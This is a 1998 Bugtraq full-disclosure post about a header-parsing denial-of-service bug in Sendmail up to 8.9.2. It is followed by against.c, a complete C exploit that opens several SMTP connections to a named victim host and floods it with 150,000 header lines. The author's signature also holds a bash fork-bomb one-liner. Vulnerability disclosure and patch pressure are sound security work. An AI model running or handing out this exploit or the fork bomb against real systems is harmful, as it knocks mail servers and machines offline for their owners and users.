Date: Sat, 12 Dec 1998 19:39:56 +0100
From: Michal Zalewski <lcamtuf@IDS.PL>
To: BUGTRAQ@netspace.org
Subject: ** Sendmail 8.9.2 DoS - exploit ** get what you want!
Parts/Attachments:
   1 Shown    32 lines  Text
   2   OK     ~2 KB     Text, ""
----------------------------------------


Hello again. Yesterday, I published some rather laconic information about
two bugs in Sendmail up to 8.9.2, and decided to post only short
description of problem + suggested patch (instead of exploit), to give
developers a chance. Unfortunately, I put together information about two
completely different problems in single posting, and it confuded a lot of
people. So, to kill any senseless discussions - again:

- The first one was 'redirection attack'; I said you could call it 'bug'
  instead of 'feature', but as noone likes anonymous mailbombing,
  network overloading / scanning, it's good to apply sendmail.cf patch
  included in original posting; without it, your relay could be abused in
  many painful ways. And yes, attack has been confirmed with 8.9.2 and
  sendmail.cf from 8.9.2 with relaying enabled. I don't think there's
  anything left to talk about. Dot.

- The second one was DoS attack during headers parsing - and this is
  a bug, *confirmed on 8.9.2*. I included simple patch to source tree.
  Unfortunately, all feedback we received from developers was one-line
  response 'It has been fixed in 8.9.2'. Bullshit (sorry). I decided
  not to publish an exploit, but now I realized there's no chance for
  response from vendors if there's no real danger. So here it is.
  Attached file, against.c, should perform very 'light' attack, only
  for testing purposes. If you noticed increased LA during attack,
  your machine is vunerable. You had enough time to patch your system
  - don't blame me, but vendors. EOF.

_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM]
[http://linux.lepszy.od.kobiety.pl/~lcamtuf/] <=--=> bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]


------------------------------snip here----------------------------------

/*
  against.c - Another Sendmail (and pine ;-) DoS (up to 8.9.2)
  (c) 1999 by <marchew@linux.lepszy.od.kobiety.pl>

  Usage: ./against existing_user_on_victim_host victim_host
  Example: ./against nobody lamers.net

*/

#include <stdio.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
#include <errno.h>
#include <signal.h>
#include <getopt.h>
#include <stdlib.h>
#include <string.h>

#define MAXCONN 5
#define LINES   150000

struct hostent *hp;
struct sockaddr_in s;
int suck,loop,x;

int main(int argc,char* argv[]) {
  
  printf("against.c - another Sendmail DoS (up to 8.9.2)\n");

  if (argc-3) {
    printf("Usage: %s victim_user victim_host\n",argv[0]);
    exit(0);
  }
    
  hp=gethostbyname(argv[2]);
  
  if (!hp) {
    perror("gethostbyname");
    exit(1);
  }

  fprintf(stderr,"Doing mess: ");

  for (;loop<MAXCONN;loop++) if (!(x=fork())) {
    FILE* d;
    bcopy(hp->h_addr,(void*)&s.sin_addr,hp->h_length);
    s.sin_family=hp->h_addrtype;
    s.sin_port=htons(25);
    if ((suck=socket(AF_INET,SOCK_STREAM,0))<0) perror("socket");
    if (connect(suck,(struct sockaddr *)&s,sizeof(s))) perror("connect");
    if (!(d=fdopen(suck,"w"))) { perror("fdopen"); exit(0); }

    usleep(100000);

    fprintf(d,"helo tweety\n");
    fprintf(d,"mail from: tweety@polbox.com\n");
    fprintf(d,"rcpt to: %s@%s\n",argv[1],argv[2]);
    fprintf(d,"data\n");

    usleep(100000);

    for(loop=0;loop<LINES;loop++) {
      if (!(loop%100)) fprintf(stderr,".");
      fprintf(d,"To: x\n");
    }

    fprintf(d,"\n\n\nsomedata\n\n\n");

    fprintf(d,".\n");

    sleep(1);

    fprintf(d,"quit\n");
    fflush(d);

    sleep(100);
    shutdown(suck,2);
    close(suck);
    exit(0);
  }

  waitpid(x,&loop,0);

  fprintf(stderr,"ok\n");

  return 0;
}